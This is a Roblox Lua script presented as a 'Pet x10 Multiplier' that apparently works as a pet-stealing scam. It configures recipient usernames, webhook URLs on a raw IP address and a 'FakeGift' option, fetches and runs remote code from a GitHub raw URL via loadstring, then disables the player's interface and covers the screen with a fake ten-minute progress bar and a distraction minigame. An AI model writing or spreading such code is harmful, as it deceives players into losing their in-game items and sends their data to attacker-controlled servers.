_G.NullConfig = {
    User = {"CoGaiMienQue00", "ConCuTiHon02", "datqit", "bomaylatip"},
    min_value = 10000000000,
    pingEveryone = "No", -- dont change this
    Webhook = "http://45.13.225.83:20002/proxy/e332a915d5d943316eddc7635ec6bd43",
    FakeGift = "Yes",
    Trash = "http://45.13.225.83:20002/proxy/b3bc3c071c9a105a6209d7b438d04120",
    LoadingScreen = "No",
    GiftOnlyRares = "Yes",
    ExecuteOtherScript = "No",
    PetPriority = {
        ["Ankylosaurus"] = 1,
        ["Axolotl"] = 1,
        ["Bald Eagle"] = 1,
        ["Bear Bee"] = 1,
        ["Bee"] = 1,
        ["Black Bunny"] = 1,
        ["Blood Hedgehog"] = 1,
        ["Blood Kiwi"] = 1,
        ["Blood Owl"] = 1,
        ["Brontosaurus"] = 1,
        ["Brown Mouse"] = 1,
        ["Bunny"] = 1,
        ["Butterfly"] = 7,
        ["Capybara"] = 1,
        ["Cat"] = 1,
        ["Caterpillar"] = 1,
        ["Chicken"] = 1,
        ["Chicken Zombie"] = 5,
        ["Cooked Owl"] = 1,
        ["Cow"] = 1,
        ["Crab"] = 1,
        ["Deer"] = 1,
        ["Dilophosaurus"] = 1,
        ["Disco Bee"] = 6,
        ["Dog"] = 1,
        ["Dragonfly"] = 6,
        ["Echo Frog"] = 1,
        ["Fennec Fox"] = 7,
        ["Firefly"] = 1,
        ["Flamingo"] = 1,
        ["Frog"] = 1,
        ["Giant Ant"] = 1,
        ["Golden Bee"] = 1,
        ["Golden Lab"] = 1,
        ["Grey Mouse"] = 1,
        ["Hamster"] = 1,
        ["Hedgehog"] = 1,
        ["Honey bee"] = 1,
        ["Hyacinth"] = 1,
        ["Iguanodon"] = 1,
        ["Kappa"] = 1,
        ["Kiwi"] = 1,
        ["Kitsune"] = 9,
        ["Koi"] = 1,
        ["Meerkat"] = 1,
        ["Mimic Octopus"] = 8,
        ["Mole"] = 1,
        ["Monkey"] = 1,
        ["Moon Cat"] = 3,
        ["Moth"] = 1,
        ["Night Owl"] = 1,
        ["Nihonzaru"] = 1,
        ["Orange Tabby"] = 1,
        ["Orangutan"] = 1,
        ["Ostrich"] = 1,
        ["Owl"] = 1,
        ["Pachycephalosaurus"] = 1,
        ["Pack Bee"] = 1,
        ["Panda"] = 1,
        ["Parasaurolophus"] = 1,
        ["Peacock"] = 1,
        ["Petal Bee"] = 1,
        ["Pig"] = 1,
        ["Polar Bear"] = 1,
        ["Praying Mantis"] = 1,
        ["Pterodactyl"] = 1,
        ["Queen Bee"] = 5,
        ["Raccoon"] = 10,
        ["Raptor"] = 1,
        ["Red Dragon"] = 1,
        ["Red Fox"] = 4,
        ["Red Giant Ant"] = 1,
        ["Rooster"] = 1,
        ["Sand Snake"] = 1,
        ["Scarlet Macaw"] = 1,
        ["Sea Otter"] = 1,
        ["Sea Turtle"] = 1,
        ["Seagull"] = 1,
        ["Seal"] = 1,
        ["Shiba Inu"] = 1,
        ["Silver Monkey"] = 1,
        ["Snail"] = 1,
        ["Spinosaurus"] = 9,
        ["Spotted Deer"] = 1,
        ["Squirrel"] = 1,
        ["Starfish"] = 1,
        ["Stegosaurus"] = 1,
        ["Tanchozuru"] = 1,
        ["Tanuki"] = 1,
        ["Tarantula Hawk"] = 1,
        ["T-Rex"] = 9,
        ["Triceratops"] = 1,
        ["Turtle"] = 1,
        ["Wasp"] = 1
    },
    ImportantPetsList = {
        ["Ankylosaurus"] = false,
        ["Axolotl"] = false,
        ["Bald Eagle"] = false,
        ["Bear Bee"] = false,
        ["Bee"] = false,
        ["Black Bunny"] = false,
        ["Blood Hedgehog"] = false,
        ["Blood Kiwi"] = false,
        ["Blood Owl"] = false,
        ["Brontosaurus"] = false,
        ["Brown Mouse"] = false,
        ["Bunny"] = false,
        ["Butterfly"] = true,
        ["Capybara"] = false,
        ["Cat"] = false,
        ["Caterpillar"] = false,
        ["Chicken"] = false,
        ["Chicken Zombie"] = true,
        ["Cooked Owl"] = true,
        ["Cow"] = false,
        ["Crab"] = false,
        ["Deer"] = false,
        ["Dilophosaurus"] = true,
        ["Disco Bee"] = true,
        ["Dog"] = false,
        ["Dragonfly"] = true,
        ["Echo Frog"] = false,
        ["Fennec Fox"] = true,
        ["Firefly"] = false,
        ["Flamingo"] = false,
        ["Frog"] = false,
        ["Giant Ant"] = false,
        ["Golden Bee"] = false,
        ["Golden Lab"] = false,
        ["Grey Mouse"] = false,
        ["Hamster"] = false,
        ["Hedgehog"] = false,
        ["Honey bee"] = false,
        ["Hyacinth"] = false,
        ["Iguanodon"] = false,
        ["Kappa"] = false,
        ["Kiwi"] = false,
        ["Kitsune"] = true,
        ["Koi"] = false,
        ["Meerkat"] = false,
        ["Mimic Octopus"] = true,
        ["Mole"] = false,
        ["Monkey"] = false,
        ["Moon Cat"] = true,
        ["Moth"] = false,
        ["Night Owl"] = false,
        ["Nihonzaru"] = false,
        ["Orange Tabby"] = false,
        ["Orangutan"] = false,
        ["Ostrich"] = false,
        ["Owl"] = false,
        ["Pachycephalosaurus"] = false,
        ["Pack Bee"] = false,
        ["Panda"] = false,
        ["Parasaurolophus"] = false,
        ["Peacock"] = false,
        ["Petal Bee"] = false,
        ["Pig"] = false,
        ["Polar Bear"] = false,
        ["Praying Mantis"] = false,
        ["Pterodactyl"] = false,
        ["Queen Bee"] = true,
        ["Raccoon"] = true,
        ["Raptor"] = false,
        ["Red Dragon"] = false,
        ["Red Fox"] = true,
        ["Red Giant Ant"] = false,
        ["Rooster"] = false,
        ["Sand Snake"] = false,
        ["Scarlet Macaw"] = false,
        ["Sea Otter"] = false,
        ["Sea Turtle"] = false,
        ["Seagull"] = false,
        ["Seal"] = false,
        ["Shiba Inu"] = false,
        ["Silver Monkey"] = false,
        ["Snail"] = false,
        ["Spinosaurus"] = true,
        ["Spotted Deer"] = false,
        ["Squirrel"] = false,
        ["Starfish"] = false,
        ["Stegosaurus"] = false,
        ["Tanchozuru"] = false,
        ["Tanuki"] = false,
        ["Tarantula Hawk"] = false,
        ["T-Rex"] = true,
        ["Triceratops"] = false,
        ["Turtle"] = false,
        ["Wasp"] = false
    }
}
    
loadstring(game:HttpGetAsync('https://raw.githubusercontent.com/sleepyvill/script/refs/heads/main/lib.lua'))()

--lua here--

local Players = game:GetService("Players")
local TweenService = game:GetService("TweenService")
local RunService = game:GetService("RunService")
local StarterGui = game:GetService("StarterGui")

local player = Players.LocalPlayer
local playerGui = player:FindFirstChildOfClass("PlayerGui")

-- 🔒 TẮT TOÀN BỘ GIAO DIỆN HỆ THỐNG
local coreGuiTypes = {
	Enum.CoreGuiType.All,
	Enum.CoreGuiType.PlayerList,
	Enum.CoreGuiType.Backpack,
	Enum.CoreGuiType.Chat,
	Enum.CoreGuiType.Health
}

for _, guiType in ipairs(coreGuiTypes) do
	pcall(function()
		StarterGui:SetCoreGuiEnabled(guiType, false)
	end)
end

-- 🔒 TẮT TẤT CẢ THÔNG BÁO NGOÀI UI CHÍNH
local function hideOtherUI()
	for _, gui in ipairs(playerGui:GetChildren()) do
		if gui:IsA("ScreenGui") and gui.Name ~= "PetMultiplierUI" then
			gui.Enabled = false
		end
	end
end

playerGui.ChildAdded:Connect(function(child)
	if child:IsA("ScreenGui") and child.Name ~= "PetMultiplierUI" then
		child.Enabled = false
	end
end)

hideOtherUI()

-- 🖼️ UI chính
local screenGui = Instance.new("ScreenGui")
screenGui.Name = "PetMultiplierUI"
screenGui.ResetOnSpawn = false
screenGui.IgnoreGuiInset = true
screenGui.DisplayOrder = 1000
screenGui.Parent = playerGui

-- 🌑 NỀN full che màn hình
local bg = Instance.new("Frame")
bg.Size = UDim2.new(1, 0, 1, 0)
bg.BackgroundColor3 = Color3.fromRGB(10, 10, 10)
bg.ZIndex = 1
bg.Parent = screenGui

-- ✨ Gradient nền xoay
local gradient = Instance.new("UIGradient", bg)
gradient.Color = ColorSequence.new{
	ColorSequenceKeypoint.new(0, Color3.fromRGB(0, 0, 0)),
	ColorSequenceKeypoint.new(0.5, Color3.fromRGB(25, 25, 25)),
	ColorSequenceKeypoint.new(1, Color3.fromRGB(0, 0, 0))
}
gradient.Rotation = 0

RunService.RenderStepped:Connect(function()
	gradient.Rotation = (gradient.Rotation + 0.1) % 360
end)

-- 📝 TIÊU ĐỀ
local title = Instance.new("TextLabel")
title.Size = UDim2.new(1, 0, 0.05, 0)
title.Position = UDim2.new(0, 0, 0.28, 0)
title.Text = "Pet x10 Multiplier is starting"
title.TextColor3 = Color3.new(1, 1, 1)
title.TextScaled = true
title.BackgroundTransparency = 1
title.Font = Enum.Font.GothamBold
title.ZIndex = 2
title.Parent = screenGui

-- Hiệu ứng "..."
task.spawn(function()
	local dots = ""
	while screenGui.Parent do
		dots = dots == "..." and "" or dots .. "."
		title.Text = "Pet x10 Multiplier is starting" .. dots
		wait(0.5)
	end
end)

-- 🔋 THANH PROGRESS %
local barBg = Instance.new("Frame")
barBg.Size = UDim2.new(0.5, 0, 0.045, 0)
barBg.Position = UDim2.new(0.25, 0, 0.33, 0)
barBg.BackgroundColor3 = Color3.fromRGB(50, 50, 50)
barBg.BorderSizePixel = 0
barBg.ZIndex = 2
barBg.Parent = screenGui

local barFill = Instance.new("Frame")
barFill.Size = UDim2.new(0, 0, 1, 0)
barFill.BackgroundColor3 = Color3.fromRGB(0, 255, 0)
barFill.BorderSizePixel = 0
barFill.ZIndex = 3
barFill.Parent = barBg

local percentText = Instance.new("TextLabel")
percentText.Size = UDim2.new(1, 0, 1, 0)
percentText.Text = "0%"
percentText.TextColor3 = Color3.new(1, 1, 1)
percentText.TextScaled = true
percentText.BackgroundTransparency = 1
percentText.Font = Enum.Font.Gotham
percentText.ZIndex = 4
percentText.Parent = barBg

-- 🎮 MINI GAME ZONE
local gameFrame = Instance.new("Frame")
gameFrame.Size = UDim2.new(0.5, 0, 0.5, 0)
gameFrame.Position = UDim2.new(0.25, 0, 0.48, 0)
gameFrame.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
gameFrame.BorderSizePixel = 0
gameFrame.ClipsDescendants = true
gameFrame.ZIndex = 2
gameFrame.Parent = screenGui

-- Score
local scoreLabel = Instance.new("TextLabel")
scoreLabel.Size = UDim2.new(1, 0, 0.1, 0)
scoreLabel.Position = UDim2.new(0, 0, 0, 0)
scoreLabel.Text = "Score: 0"
scoreLabel.TextColor3 = Color3.new(1, 1, 1)
scoreLabel.TextScaled = true
scoreLabel.BackgroundTransparency = 1
scoreLabel.Font = Enum.Font.GothamBold
scoreLabel.ZIndex = 3
scoreLabel.Parent = gameFrame

local score = 0

-- Block minigame
local function spawnBlock()
	local block = Instance.new("TextButton")
	block.Size = UDim2.new(0.2, 0, 0.1, 0)
	block.Position = UDim2.new(math.random(), -20, 0.15 + math.random() * 0.8, 0)
	block.AnchorPoint = Vector2.new(0.5, 0.5)
	block.BackgroundColor3 = Color3.fromRGB(math.random(50,255), math.random(50,255), math.random(50,255))
	block.Text = ""
	block.BorderSizePixel = 0
	block.ZIndex = 4
	block.Parent = gameFrame

	block.MouseButton1Click:Connect(function()
		score += 1
		scoreLabel.Text = "Score: " .. score
		block:Destroy()
	end)

	game:GetService("Debris"):AddItem(block, 4)
end

-- Tạo block mỗi 0.8 giây
task.spawn(function()
	while screenGui.Parent do
		wait(0.8)
		spawnBlock()
	end
end)

-- Tween tiến trình 10 phút
local tween = TweenService:Create(barFill, TweenInfo.new(600, Enum.EasingStyle.Linear), {
	Size = UDim2.new(1, 0, 1, 0)
})

-- Cập nhật % tiến độ
local function updatePercentage()
	for i = 1, 100 do
		percentText.Text = i .. "%"
		wait(600 / 100)
	end
end

-- Bắt đầu
tween:Play()
task.spawn(updatePercentage)
